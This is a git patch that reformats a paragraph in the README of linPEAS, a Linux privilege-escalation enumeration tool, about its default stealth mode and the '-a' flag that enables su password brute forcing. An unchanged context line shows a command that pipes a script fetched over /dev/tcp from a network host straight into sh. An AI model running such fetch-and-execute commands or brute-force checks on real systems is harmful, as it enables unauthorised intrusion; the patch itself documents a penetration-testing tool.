From 4ce213b8fa61abc468453d8f776b8af3f69d43c3 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Sat, 7 Dec 2019 23:29:51 +0000 Subject: [PATCH] Update README.md --- linPEAS/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/linPEAS/README.md b/linPEAS/README.md index 312b4a7..3307e74 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -26,7 +26,9 @@ cat < /dev/tcp/10.10.10.10/80 | sh ``` ## IMPORTANT CHANGE -**For satisfying most users and thanks to the incorporation of the 2000pwds/user su bruteforce, the default behaviour of linpeas has been changed to fast/stealth (no writting to disk, no 1min processes check, and no su BF). Use the parameter -a to execute all these checks** +**For satisfying most users and thanks to the incorporation of the 2000pwds/user su bruteforce, the default behaviour of linpeas has been changed to fast/stealth (no writting to disk, no 1min processes check, and no su BF).** + +**Use the parameter `-a` to execute all these checks.** ## Basic Information